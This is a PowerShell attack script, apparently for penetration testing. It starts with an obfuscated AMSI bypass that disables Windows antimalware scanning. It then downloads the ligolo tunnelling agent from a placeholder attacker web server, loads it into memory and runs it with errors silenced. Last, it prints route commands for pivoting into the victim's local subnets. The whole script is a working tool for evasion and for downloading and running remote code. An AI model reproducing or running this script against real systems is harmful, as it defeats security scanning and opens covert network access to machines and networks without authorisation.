S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )


# Download ligolo.exe
$bytes = (New-Object System.Net.WebClient).DownloadData("http://<IPADDRESS>:<WEBPORT>/ligolo.exe")
if ($bytes.Length -eq 0) {
    Write-Host "Downloaded ligolo.exe is empty. Check the webserver!" -ForegroundColor Red
    exit
}

# Load the assembly
$wp = [System.Reflection.Assembly]::Load($bytes)

# Get the Program type
$type = $wp.GetType("Program")

# Invoke the RunAgent method
try {
    $type.GetMethod("RunAgent", [System.Reflection.BindingFlags]::Static -bor [System.Reflection.BindingFlags]::Public).Invoke($null, $null)
} catch {
    # Suppress errors
}
#$type.GetMethod("RunAgent", [System.Reflection.BindingFlags]::Static -bor [System.Reflection.BindingFlags]::Public).Invoke($null, $null)

Start-Sleep -Seconds 20

Write-Host "Now, kill the webserver!" -ForegroundColor DarkYellow

# Run ipconfig and filter for lines containing 'IPv4'
$ipconfigOutput = ipconfig | Select-String 'IPv4'

# Extract just the IPv4 addresses from the filtered lines
$ipv4Addresses = $ipconfigOutput -replace '.*:\s*', ''

# Display the found IPv4 addresses
#$ipv4Addresses

foreach ($address in $ipv4Addresses) {
    # Split the address into its octets
    $octets = $address -split '\.'

    # Set the 4th octet to 0 to form the /24 network address
    $octets[3] = '0'

    # Join the modified octets to form the network address
    $networkAddress = $octets -join '.'

    # Construct the command
    $command = "sudo ip route add $networkAddress/24 dev ligolo"

    # Display the command
    Write-Host $command -ForegroundColor Yellow
}

Write-Host "I mean it!  DONT FORGET TO KILL THE WEBSERVER!!!" -ForegroundColor Cyan